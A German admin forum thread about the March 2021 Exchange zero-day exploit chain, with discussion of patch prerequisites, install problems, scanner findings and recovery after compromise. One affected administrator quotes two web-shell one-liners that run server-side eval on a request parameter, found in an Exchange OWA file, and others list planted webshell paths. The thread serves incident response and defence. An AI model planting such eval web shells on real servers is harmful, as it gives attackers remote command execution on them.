0-day Exploit Chain für Exchange Server - Patches verfügbar

Mitglied: kgborn

kgborn (Level 2) - Jetzt verbinden

03.03.2021, aktualisiert 17:58 Uhr, 2795 Aufrufe, 27 Kommentare, 8 Danke

Zur Info: Microsoft warnt vor einer Exploit-Chain, bei der vier 0-day-Schwachstellen für gezielte Angriffe auf Exchange per Outlook Web App kombiniert werden (eine chines. Hackergruppe wird dahinter vermutet). Administratoren von On-PremisesMicrosoft Exchange-Servern sollten dringen reagieren und die zum 2. März 2021 freigegebenen Updates installieren. Auch für Exchange Server 2010 gibt es noch ein Sicherheitsupdate.

Microsoft hat folgende Beiträge zum Thema veröffentlicht:


Zusammenfassung: Exchange-Server 0-day-Exploits werden aktiv ausgenutzt, patchen!
27 Kommentare
Mitglied: spec1re
03.03.2021 um 07:23 Uhr
Danke, Patch wurde problemlos installiert. (Ex2016CU19)
Bitte warten ..
Mitglied: Thomas2
03.03.2021, aktualisiert um 08:42 Uhr
Moin moin,

wird das Update nicht über das Windows Update feature verteilt?
Das CU19 ist von Dezember und enthält keinen Hinweis auf eine Aktualisierung.

"Cumulative Update 19 for Microsoft Exchange Server 2016 was released on December 15, 2020. This cumulative update includes fixes for nonsecurity issues and all previously released fixes for security and nonsecurity issues. These fixes will also be included in later cumulative updates for Exchange Server 2016. This update also resolves vulnerabilities, see Microsoft Common Vulnerabilities and Exposures CVE-2020-17117, CVE-2020-17132, CVE-2020-17141, CVE-2020-17142, CVE-2020-17143.

This update also includes new daylight saving time (DST) updates for Exchange Server 2016. For more information about DST, see Daylight Saving Time Help and Support Center."
Bitte warten ..
Mitglied: spec1re
03.03.2021, aktualisiert um 08:51 Uhr
@Thomas2

Um KB5000871 installieren zu können brauchst du mindestens Ex2013 mit CU23, Ex2016 mit CU18/CU19 oder Ex2019 mit CU7/CU8.

https://www.frankysweb.de/exchange-server-neue-sicherheitsupdates-maerz- ...
Bitte warten ..
Mitglied: Thomas2
03.03.2021 um 08:59 Uhr
Hi Spec1re,

wir haben CU17, wenn ich die Version abfrage. Dann installiere ich das CU19. Auch da nochmal für mich zum Verständnis: Wenn ich das System immer über Windows Update aktualisiere ist es trotzdem nicht aktuell?

Vielen Dank.
Bitte warten ..
Mitglied: spec1re
03.03.2021 um 09:06 Uhr
Richtig, in diesem speziellen Fall dauert es etwas länger bis das Update über WU/WSUS erhältlich ist.

Für CU17 gibt es kein Patch, also musst du mindestens auf CU 18, besser gleich auf CU19 hoch gehen.

Gruß Spec.
Bitte warten ..
Mitglied: VGem-e
03.03.2021 um 13:25 Uhr
Servus,

Installation problemlos verlaufen, habe mich positiv gewundert, dass der Reboot der VM heute Vormittag nach diesem Update so schnell durch war.

Gruß
Bitte warten ..
Mitglied: Thomas2
05.03.2021, aktualisiert um 08:57 Uhr
Morning,

wir haben das Update von CU17 auf CU19 durchgeführt und den Sicherheitspatch installiert. Seitdem funktioniert bei uns im Outlook und im OWA die Suche nicht mehr.

Gruß,
Thomas

€: Nach einem Neuaufbau des Indexes geht die Suche auch wieder.
Frankys: Index neu erstellen
Bitte warten ..
Mitglied: radiogugu
06.03.2021, aktualisiert um 10:03 Uhr
Hallo.

Exchange 2019 CU8

Ging, als ich die Hinweise bis gaaaaanz zum Schluss gelesen hatte, dann den Patch ausgeführt in einem Command Prompt, welches als Administrator gestartet wurde :) face-smile

EDIT: Backup wieder eingespielt. Es sah so aus, dass alles funktioniert, aber leider wollte der "Microsoft Filterwaltungsdienst" nicht mehr starten.
Keine Lösung gefunden. Also bleibt das System erst einmal ungepatcht. Werde weiter nach einer Lösung suchen
:( face-sad

Gruß
Marc
Bitte warten ..
Mitglied: beidermachtvongreyscull
06.03.2021 um 21:48 Uhr
Moin,

kann jemand die Brisanz dieser Sicherheitslücken einschätzen, wenn vor dem Exchange eine Sophos UTM mit u.a. URL-Hardening und 2FA auf OWA vorhanden ist?

Gruß
bdmvg
Bitte warten ..
Mitglied: spec1re
06.03.2021 um 21:56 Uhr
Das Problem ist ja das die Auth komplett umgangen wird, keine Ahnung ob da 2FA was bringt. Kannst ja mal das Script von Microsoft auf dem Exchange laufen lassen, das sagt dir dann auch gleich was Sache ist.

https://github.com/microsoft/CSS-Exchange/tree/main/Security

Gruß Spec
Bitte warten ..
Mitglied: anteNope
06.03.2021 um 22:04 Uhr
Hi,

ich habe meine 2016er und 2019er direkt aktualisiert. Aktuellste CU und Patches liefen problemfrei durch.

Danach hatte ich nach den von Microsoft genannten ASPX-Dateien gesucht, aber manuell nichts entsprechendes gefunden.
Nun hat aber der Virenscanner zwei Dateien gefunden und direkt entfernt:

  • C:\inetpub\wwwroot\aspnet_client\discover.aspx (CVE-2021-26855.Webshell.A Trojaner)
  • C:\inetpub\wwwroot\aspnet_client\OutlookEN.aspx (CVE-2021-26855.Webshell.B Trojaner)

Die erste Datei wurde am 04.03. vom Echtzeit Dateischutz gelöscht. Die zweite wurde erst heute erkannt. Produkt im Einsatz ist "ESET-Mail-Security".

Einen aktiven Abgriff von Daten konnte ich bislang nicht feststellen.


Solch Mist wird wohl in den nächsten Jahren zum Standard werden.
Bitte warten ..
Mitglied: beidermachtvongreyscull
07.03.2021 um 07:57 Uhr
Danke!

Die Auth des EX mit Sicherheit, aber die der Firewall nicht.
Selbst wenn der EX alles durchlassen würde, muss die FW dennoch ihr OK geben.

Ich schau mir das Script mal an.

Gruß
bdmvg
Bitte warten ..
Mitglied: spec1re
07.03.2021 um 08:43 Uhr
Hier ein aktuelle Liste von Microsoft mit Tools und Scripten für den Exchange:

https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vul ...

Ich lasse gerade mal den MSERT durch laufen...

Gruß Spec
Bitte warten ..
Mitglied: wieoderwas
08.03.2021, aktualisiert um 10:31 Uhr
Hallo Ich habe den Microsoft Safety Scanner - 1.0.3001.0 durchlaufen lassen und folgende Meldung erhalten:

Exploit: ASP/CVE-2021-27065.B!dha Teilweise entfern, Neustart erforderlich.

Unter dem Pfad:

%PROGRAMFILES%\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\

Sehe ich die RedirSuiteServerProxa. aspx

wie kann ich diese auslesen um zu überprüfen ob da solche Informationen drin stehen?

http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>

oder

http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["klk123456"],"unsafe");}</script>

Der Exchangeserver (2013) hat die ProductVersion
15.00.1365.001 und hat alle Sicherheitsupdates eingespielt.

HTTP Zugänge sind dicht.

Habe den Saftey Scanner nach Neustart nun nochmal durchlaufen lassen. Nichts mehr gefunden :/
Bitte warten ..
Mitglied: psannz
08.03.2021 um 10:34 Uhr
Zitat von @wieoderwas:
Der Exchangeserver (2013) hat die ProductVersion
15.00.1365.001 und hat alle Sicherheitsupdates eingespielt.

Das ist Exchange Server 2013 CU19 und damit verwundbar. Für CU19 wird die Verwundbarkeit auch nicht mehr behoben!
Exchange Server - Buildnummern und Veröffentlichungstermine

Bitte aktualisiere dringend auf Kumulatives Update 23 für Exchange Server 2013 (KB4489622) und installiere danach das Security Update.
Bitte warten ..
Mitglied: wieoderwas
08.03.2021 um 11:23 Uhr
Das ist Exchange Server 2013 CU19 und damit verwundbar. Für CU19 wird die Verwundbarkeit auch nicht mehr behoben!
Exchange Server - Buildnummern und Veröffentlichungstermine

Bitte aktualisiere dringend auf Kumulatives Update 23 für Exchange Server 2013 (KB4489622) und installiere danach das Security Update.

Bringt das denn überhaupt noch was? Es sieht ja so aus als ob das System schon infiziert ist.
Bitte warten ..
Mitglied: Dani
08.03.2021 um 11:36 Uhr
Moin @wieoderwas
Bringt das denn überhaupt noch was? Es sieht ja so aus als ob das System schon infiziert ist.
eigentlich kannst du dir die Zeit sparen. Du kannst dich mit dem Recovery beschäftigen. Davor aber die Schotten dicht machen, damit nicht gleich wieder die Infektion geschieht. Danach sämtliche Passwörter von allen Benutzern ändern. Nun kannst du dich ans Werk machen.


Gruß,
Dani
Bitte warten ..
Mitglied: wieoderwas
08.03.2021 um 11:41 Uhr
Zitat von @Dani:

Moin @wieoderwas
Bringt das denn überhaupt noch was? Es sieht ja so aus als ob das System schon infiziert ist.
eigentlich kannst du dir die Zeit sparen. Du kannst dich mit dem Recovery beschäftigen. Davor aber die Schotten dicht machen, damit nicht gleich wieder die Infektion geschieht. Danach sämtliche Passwörter von allen Benutzern ändern. Nun kannst du dich ans Werk machen.


Gruß,
Dani
Ich würde es wohl so vorgehen:
https://www.frankysweb.de/exchange-server-neuinstallation-ohne-datenverl ...
Bitte warten ..
Mitglied: mossox
08.03.2021 um 19:13 Uhr
Uns hat es auch getroffen.
Basis ist hier ein W2012 R2 in Kombination mit Exchange 2016.
Es wird alles regelmäßig gepatched, aber das war nicht absehbar.
Die erste Attacke hatten wir in der Nacht zum 3.3.21.
Entdeckt wurde es heute. Ich kann nicht erkennen, ob es einen direkten Datenzugriff gab.

Wird ne lange Nacht...
Bitte warten ..
Mitglied: kgborn
08.03.2021 um 19:57 Uhr
Die Europäische Bankenaufsicht ist Opfer der Exchange-Schwachstelle - ich berichtete im Blog.

https://www.borncity.com/blog/2021/03/08/cyber-angriff-auf-exchange-serv ...

Ich habe das Thema auch mal bei heise im News-Ticker veröffentlicht.

https://www.heise.de/news/Cyberangriff-auf-Exchange-Server-der-Europaeis ...

Da dürfte die Tage noch mehr kommen (bei ~170.000 potentiell betroffenen Systemen).
Bitte warten ..
Mitglied: beidermachtvongreyscull
08.03.2021 um 20:53 Uhr
Kollegen wisst Ihr, was ich noch nicht gestrahlt habe?

So ziemlich jede Quelle ballert pauschal raus, dass die EX 2013 - 2019 betroffen seien.

Was mich wundert:
Die Quellen berichten, dass die Angriffe aber erst seit etwa Januar laufen würden und dass natürlich nur Sicherheitsupdates für die aktuellsten CUs rauskommen.

Kann es also sein, dass mit den letzten CUs MS da nen Fehler eingebaut hat?

Ich habe seit längerem das Gefühl, dass die Qualität der MS-Updates wieder auf das NT4.0-Niveau gefallen ist:
  • Installationen dauern ewig
  • Update Chains sind wieder da

Aber vielleicht irre ich mich ja auch.

Gruß
bdmvg
Bitte warten ..
Mitglied: Dani
08.03.2021, aktualisiert um 22:31 Uhr
Moin,
So ziemlich jede Quelle ballert pauschal raus, dass die EX 2013 - 2019 betroffen seien.
Exchange 2010 ist ebenfalls betroffen. Ist grundsätzlich seit 13.10.2020 EoS.

Update Chains sind wieder da
Hast du ein aktuelles Beispiel? Für Exchange Server ab 2013 fällt mir keines ein.

Aber vielleicht irre ich mich ja auch.
Ich habe schon überlegt, ob die Lücken aus dem Arsenal von FireEye durch den Solarwinds Hack stammen?!


Gruß,
Dani
Bitte warten ..
Mitglied: beidermachtvongreyscull
08.03.2021 um 22:29 Uhr
Die CUs vom EX2016 sind von bestimmten .net-Framework-Versionen abhängig.

Du kannst also vom Stand X z.b. CU11 nicht direkt aktualisieren sondern musst nen Zwischenstopp über CU14 machen.


Beim 2010er war das schöner gelöst.

Gruß
bdmvg
Bitte warten ..
Mitglied: themuck
09.03.2021 um 12:13 Uhr
Zitat von @beidermachtvongreyscull:
Die CUs vom EX2016 sind von bestimmten .net-Framework-Versionen abhängig.
Ja, aber du kannst mit etwas manuellem aufwand das auch Direkt machen, ohne diesen Zwischenstop...

https://www.msxfaq.de/exchange/update/exchange_direktes_update.htm

Was mich wunderte, Windows Update hat mir den Patch nicht angezeigt, ich hab ihn Manuell nachschieben müssen. Unser 2013er mit CU23 hängt glücklicherweise aber nicht offen im Netz. (Eine Empfehlung eines ehemaligen MS Entwicklers)

Was ich mich auch frage, wie findet man die URLs der Exchange so schnell. Das doch alles recht gut vorbereitet worden...
Bitte warten ..
Mitglied: psannz
09.03.2021, aktualisiert um 13:01 Uhr
Zitat von @themuck:
Was ich mich auch frage, wie findet man die URLs der Exchange so schnell. Das doch alles recht gut vorbereitet worden...

autodiscover.domain.suffix/owa/
Mehr brauchst du meistens nicht.
Bitte warten ..
Mitglied: Dani
09.03.2021, aktualisiert um 18:11 Uhr
Moin,
Microsoft hat heute Nacht für weitere CU's das Sicherheitsupdate bereitgestellt.
Security Update For Exchange Server 2016 Cumulative Update 14 (KB5000871)
Security Update For Exchange Server 2016 Cumulative Update 15 (KB5000871)
Security Update For Exchange Server 2016 Cumulative Update 16 (KB5000871)
Security Update For Exchange Server 2019 Cumulative Update 4 (KB5000871)
Security Update For Exchange Server 2019 Cumulative Update 5 (KB5000871)
Security Update For Exchange Server 2019 Cumulative Update 6 (KB5000871)

Details wie immer im KB-Artikel: https://support.microsoft.com/en-us/topic/description-of-the-security-up ...



Gruß,
Dani
Bitte warten ..
Mitglied: beidermachtvongreyscull
09.03.2021, aktualisiert um 19:38 Uhr
Mal gespannt, ob noch einer für 2016 CU11 rauskommt. :-) face-smile
Bitte warten ..
Heiß diskutierte Inhalte
Datenschutz
Regierung testet Einsatz von Microsoft Azure-Cloud für die Bundescloud
VisuciusVor 1 TagInformationDatenschutz34 Kommentare

LÄUFT! Deutschland will Microsoft für die Bundescloud testen Ich hätts ja beinahe unter dem Topic "Humor" veröffentlicht. Aber der 1. April ist ja durch ...

Festplatten, SSD, Raid
Festplatte aus defekten Notebook ausgebaut - wird nicht erkannt - Wie gelange ich an meine Daten?
1nCoreVor 1 TagFrageFestplatten, SSD, Raid14 Kommentare

Hallo liebe Community, nach 7 Jahren hat mein XMG Notebook seinen Geist aufgegeben In dem Notebook waren zwei Festplatten verbaut (eine für System und ...

Erkennung und -Abwehr
Wie geschickt sich Malware verstecken kann - Ein Beispiel aus der Praxis eines Security Experts
colinardoVor 16 StundenTippErkennung und -Abwehr3 Kommentare

Servus Kollegen und Mitstreiter, da ja in letzter Zeit die Exchange-Lücken die Admin-Landschaft ziemlich aufgewirbelt haben und dabei auch immer mal wieder "sogenannte" Admins ...

Internet
Woher holt sich Android die Kontaktdaten von unbekannten Rufnummern?
gelöst anteNopeVor 1 TagFrageInternet8 Kommentare

Hallo zusammen, seit einiger Zeit merke ich, dass mir mein Android Gerät Namen und Informationen zu mir unbekannten Teilnehmern präsentiert. Soll heißen eine nicht ...

Windows Netzwerk
MS Lizenzierung - externe Scandienstleistung
monstermaniaVor 1 TagFrageWindows Netzwerk9 Kommentare

Hallo Allerseits, ich habe da mal eine Frage an die MS Lizenzspeziallisten. Eine externe Firma soll Scandienstleistungen für uns erledigen. Dazu ist angedacht, dass ...

Exchange Server
Exchange Update CU19 auf CU20 Fehler - Eine weitere Version dieses Produkts ist bereits installiert
gelöst StefanKittelVor 1 TagFrageExchange Server6 Kommentare

Hallo, ich habe hier einen Exchange 2016 mit CU19 (15.1.2176.2). Darauf wollte ich nun CU20 installiert. Download Es erscheint Eine weitere Version dieses Produkts ...

Exchange Server
April 2021 Microsoft Exchange Server Security Updates
FrankVor 1 TagInformationExchange Server2 Kommentare

Microsoft has released security updates for vulnerabilities found in: Exchange Server 2013 Exchange Server 2016 Exchange Server 2019 These updates are available for the ...

LAN, WAN, Wireless
WLAN Bridge mit VLAN Übertragung
kcmurdocVor 1 TagFrageLAN, WAN, Wireless18 Kommentare

ich bin leider im Netzwerk Thema nicht so drinne. Daher wende ich mich an euch. Folgende Aufgabe habe ich. Aktuell gibt es in einem ...